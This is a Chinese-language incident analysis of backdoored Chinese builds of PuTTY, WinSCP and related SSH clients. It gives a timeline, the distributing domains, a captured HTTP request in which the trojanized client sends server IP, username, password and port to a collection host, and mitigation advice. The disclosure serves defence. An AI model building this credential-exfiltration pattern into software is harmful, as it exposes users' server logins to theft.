中文版putty后門事件分析

根據(jù)分析,此次事件涉及到來自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點的中文版putty、 WinSCP、SSHSecure和psftp等軟件,而這些軟件的英文版本不受影響。
1.時間線
1月25日:新浪微博有網(wǎng)友發(fā)布消息稱putty和winscp中裝有后門程序,但該條微博并未提及后門程序的類型及其技術細節(jié),而且消息也未被過多的人所重視,目前無法確定該條微博是否與此次事件有關聯(lián):
1月30日下午16點左右:互聯(lián)網(wǎng)上再度出現(xiàn)關于中文版putty等SSH管理軟件被裝有后門的消息,并且此消息對后門的行為特征進行了簡要的描述 —— 該程序會導致root密碼丟失,但發(fā)布者仍未披露具體的技術細節(jié):
以上微博的短URL所對應的文章截圖如下:
1月31日:經(jīng)過一晚的醞釀,putty事件開始在互聯(lián)網(wǎng)上廣泛傳播,微博、論壇等信息發(fā)布平臺上開始大量出現(xiàn)putty后門事件的消息,同時,很多技術人員也開始對含有后門的putty等SSH管理軟件進行技術分析,并陸續(xù)發(fā)布其中的技術細節(jié)。
2.事件分析
2.1問題軟件源頭
知道創(chuàng)宇安全研究團隊在獲取信息后,第一時間對putty等軟件進行了跟蹤分析。通過分析發(fā)現(xiàn),來自以下幾個站點的中文版putty、WinSCP、SSHSecure和psftp等軟件都可能存在后門程序:
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com
2.2行為分析
2.2.1網(wǎng)絡行為分析
使用帶有后門程序的中文版putty等SSH管理軟件連接服務器時,程序會自動記錄登錄時的用戶名、密碼和服務器IP地址等信息,并會以HTTP的方式將這些信息發(fā)送到指定的服務器上,以下是在分析過程中抓取到的原始HTTP數(shù)據(jù):
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache
從以上數(shù)據(jù)可以獲得以下信息:
- 敏感信息通過HTTP GET的方式發(fā)送到服務器l.ip-163.com上(經(jīng)測試,該域名與putty.org.cn位于同一IP地址上)
- 用于收集密碼的程序地址為http:// l.ip-163.com:88/yj33/js2.asp
- 敏感信息以GET參數(shù)的方式發(fā)送到服務器上,相關參數(shù)為:
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
每個字段的作用如下:
- act為執(zhí)行的動作,參數(shù)add用于添加信息,經(jīng)測試,也可使用del來刪除信息
- user為SSH服務器的IP地址,此處為50.23.79.188
- pwd為連接服務器時的登錄用戶名,此處為abc
- ll1為登錄密碼,此處為pass
- ll2為目標服務器的SSH端口,此處為22(即,默認端口)
- ll3則為客戶端類型,此處為PuTTY
2.2.2服務器本地文件分析
知道創(chuàng)宇安全研究團隊借助文件完整性校驗的方式,對服務器初始安全狀態(tài)下的 /etc、/lib、/usr、/bin等敏感目錄進行了完整性備份,并在putty連接測試后對這些目錄的文件變更、丟失和添加等情況進行了校驗,校驗結(jié)果顯示,中文版putty并未對服務器自動安裝后門程序。
網(wǎng)絡上部分消息稱,有些使用中文版putty進行過遠程管理的服務器上出現(xiàn)惡意代碼和文件,可能是由于惡意用戶獲取了putty所收集的密碼后人為植入所致。
2.3事件后續(xù)
截止至2月1日,在本次事件中所涉及的以下域名均已不能訪問:
http://www.putty.org.cn
http://putty.ws
http://www.winscp.cc
http://www.sshsecure.com
http://l.ip-163.com:88
但是,在1月31日晚,網(wǎng)絡上傳出“l.ip-163.com被黑”的消息并配有一張“受害者列表”的截圖:
而就在此消息發(fā)布不久之后,互聯(lián)網(wǎng)上便出現(xiàn)了完整的受害者列表供所有用戶瀏覽和下載,根據(jù)這份來自互聯(lián)網(wǎng)列表的顯示,不但有眾多網(wǎng)站位列其中,IBM、Oracle、HP等大廠商的服務器也出現(xiàn)在列表內(nèi)。
3.安全建議
若您使用過中文版的putty、WinSCP、SSHSecure和psftp等軟件,但暫時又不能對服務器進行下線處理,可采取以下臨時解決方案來處理:
- 使用chkrootkit或rootkit hunter對服務器進行掃描,檢查是否存在已知后門
- 查看網(wǎng)絡是否有可疑外聯(lián),并加強對可疑外聯(lián)的監(jiān)控
- 在網(wǎng)絡層建立端口訪問控制策略,阻止除正常業(yè)務外的一切非業(yè)務、非管理端口
- 更換SSH登錄密碼,建議登錄時使用證書加密碼的組合方式進行身份驗證
- 登錄SSH時,不要直接使用root用戶,先使用普通用戶登錄后,再su至root
- 服務器端通過TCP Wrapper或iptables等軟件,限制IP訪問,僅允許特定IP地址對服務器的SSH進行連接和管理
- 如需使用putty、WinSCP等軟件,可訪問其官方站點下載:
http://winscp.net/eng/docs/lang:chs
相關文章
- 今天我要講的是:如何成為一名真正的優(yōu)秀的道德黑客?不管是新手還是老手,有興趣的朋友們都可以看一看2023-07-03
- 這篇文章主要介紹了白帽黑客、灰帽黑客、黑帽黑客三者的區(qū)別介紹,需要的朋友可以參考下2023-07-03
什么是DDoS攻擊?CC攻擊?cc攻擊與ddos攻擊區(qū)別小結(jié)
CC和DDoS都是我們最長聽到的黑客攻擊手段,那么它們有什么區(qū)別呢?CC攻擊會造成什么后果呢?也可通過這篇文章了解更多的CC攻擊知識:什么是CC攻擊?怎么防御CC攻擊?誰的威2023-07-03- 這篇文章主要介紹了Struts2 S2-016漏洞修復總結(jié),需要的朋友可以參考下2016-08-20
- Struts2是apache項目下的一個web 框架,普遍應用于阿里巴巴、京東等互聯(lián)網(wǎng)、政府、企業(yè)門戶網(wǎng)站2016-08-20
烏云漏洞平臺被連鍋端?互聯(lián)網(wǎng)安全缺失的到底是什么
還記得我們之前說過的有個白帽子提交了世紀佳緣的漏洞然后被世紀佳緣告了的事情嗎?這件事情引起了國內(nèi)很多白帽黑帽的關注,如今事情又發(fā)酵,中國最大的兩大漏洞平臺——烏2016-07-20- 未來的互聯(lián)網(wǎng)最重要的不是速度,不是容量,而是安全。黑客這個詞很多人已經(jīng)耳熟能詳,雖然他們是一群神秘的人,但不能判斷他們是不是好人,越厲害的往往威脅越大。其實有一2016-07-15
支付寶花唄套現(xiàn)隱患多多 騙子已經(jīng)形成產(chǎn)業(yè)鏈
支付寶花唄是支付寶提供的第三方信用平臺,根據(jù)你的消費購物信用給你透支額度,給很多不想辦信用卡的人帶來了很多方便,但是,最近出現(xiàn)的利用花唄套現(xiàn)的人,卻在不知不覺中2016-07-14- 有一天打開電腦,發(fā)現(xiàn)電腦已經(jīng)被鎖住,窗口彈出說明:如果你不給錢,就把你的電腦清空,這就是遇到了勒索軟件。近年來,這種勒索已經(jīng)頻頻出現(xiàn)在安卓手機上,手機里的重要資2016-07-11
未來互聯(lián)網(wǎng)企業(yè)安全問題預測 網(wǎng)絡安全是場硬仗
互聯(lián)網(wǎng)的發(fā)展已經(jīng)步入穩(wěn)定期,未來不會像之前那樣呈現(xiàn)爆發(fā)性增長的狀況了,那么未來的網(wǎng)絡誰是主角?是安全。云計算與大數(shù)據(jù)在為我們的生活工作帶來方便的同時,也面臨著從2016-06-28